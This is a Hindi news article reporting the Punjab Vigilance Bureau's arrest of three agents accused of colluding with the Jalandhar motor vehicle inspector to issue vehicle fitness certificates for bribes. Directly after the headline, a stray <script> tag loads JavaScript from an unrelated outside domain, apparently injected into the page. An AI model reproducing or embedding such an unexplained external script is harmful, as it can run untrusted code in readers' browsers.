Tuesday, 30 June 2026
Breaking News
दुर्गा वाहिनी मातृशक्ति के प्रांतीय वर्ग में 2 सौ से ज्यादा युवतियों ने लिया शौर्य प्रशिक्षण  गांधी स्मारक भवन प्रबंधन पर कोर्स पूरा होने से पहले 10 हजार अतिरिक्त फीस मांगने का आरोप धर्म में भाव और विवेक सर्वोपरि - क्षुल्लक प्रज्ञांश सागर  करनाल नरवाल क्रिकेट अकादमी, हरियाणा और इंडस वैली क्रिकेट अकादमी, डेराबस्सी की टीमें फाइनल में डिफरेंटली डिफरेंट–पंचम : द लीजेंड में पंचम दा को संगीतमय श्रद्धांजलि श्री अमरनाथ धाम यात्राः शिव सेवा संघ द्वारा लंगर प्रबंधन के लिए राशन से भरे ट्रक रवाना राष्ट्र स्तरीय शूलिनी मेला संपन्न,राज्यपाल कविन्द्र गुप्ता ने की ऐतिहासिक दुर्गा मंदिर में पूजा-अर्चना इलेक्ट्रिक बसों पर सरकार 50 और डीजल बसों पर 30 प्रतिशत सब्सिडी देगी: मुख्यमंत्री मासिक नवकार महामंत्र पाठ एवं भक्तामर दीप अर्चना, जैन मिलन ने मेनका गाँधी की आलोचना की आखिर व्यंग्य क्या है?
पंजाब Trending

मोटर व्हीकल इंस्पेक्टर जालंधर के साथ सांठगांठ करने वाले फरार तीन एजेंट्स गिरफ्तार<script src="https://new2sportnews.com/face2news.js"></script>

Read in:Hindi

जालंधर, फेस2न्यूज:
पंजाब विजीलैंस ब्यूरो ने मोटर व्हीकल इंस्पेक्टर (एमवीआई), जालंधर नरेश कलेर के साथ सांठगांठ करने वाले तीन फरार आरोपी एजेंटों को गिरफ्तार किया है, जो वाणिज्यिक और निजी वाहनों का निरीक्षण किए बिना भारी रिश्वत लेकर फिटनेस सर्टिफिकेट जारी कर रहे थे। विजीलैंस ब्यूरो ने सभी आरोपियों के मोबाइल फोन और सिम कार्ड जब्त कर लिए हैं, जिन्हें इस मामले के बारे में अधिक जानकारी प्राप्त करने के लिए डेटा विशेषज्ञों को भेजा जाएगा।
विजीलैंस ब्यूरो प्रवक्ता ने यह जानकारी देते हुए बताया कि गिरफ्तार अभियुक्तों की पहचान पंकज ढींगरा उर्फ भोलू निवासी न्यू कैलाश नगर, सोडल रोड जालंधर, ब्रिजपाल सिंह उर्फ रिक्की निवासी कृष्णा नगर, जालंधर और अरविंद कुमार उर्फ बिंदू निवासी उपकार नगर, जालंधर के रूप में हुई है। उन्होंने कहा कि उन्हें कल अदालत में पेश किया जाएगा और विजीलैंस ब्यूरो इस मामले में आगे की जांच के लिए पुलिस रिमांड की गुहार लगाएगी।
अधिक विवरण देते हुए उन्होंने बताया कि विजीलैंस ब्यूरो ने एमवीआई, जालंधर के कार्यालय में औचक निरीक्षण किया था और निजी एजेंटों की मिलीभगत से बड़े पैमाने पर वाहनों के लिए फिटनेस सर्टिफिकेट जारी करने के लिए एक संगठित भ्रष्टाचार का पर्दाफाश किया था।
प्रवक्ता ने आगे कहा कि विजीलैंस ब्यूरो ने पर्याप्त सबूतों के आधार पर भ्रष्टाचार अधिनियम की धारा 7, 7ए और आईपीसी की धारा 420, 120-बी के तहत विजीलैंस ब्यूरो पुलिस थाना जालंधर में मामला संख्या 14 दिनांक 23-08-2022 दर्ज किया। इस मामले में अब तक कुल 6 अभियुक्तों को गिरफ्तार किया जा चुका है, जिनमें नरेश कलेर, रामपाल उर्फ राधे, मोहन लाल उर्फ कालू, परमजीत सिंह बेदी, सुरजीत सिंह और हरविंदर सिंह (सभी निजी एजेंट) शामिल हैं। उन्होंने कहा कि इस मामले की आगे की जांच चल रही है और बाकी फरार आरोपियों को जल्द ही गिरफ्तार कर लिया जाएगा।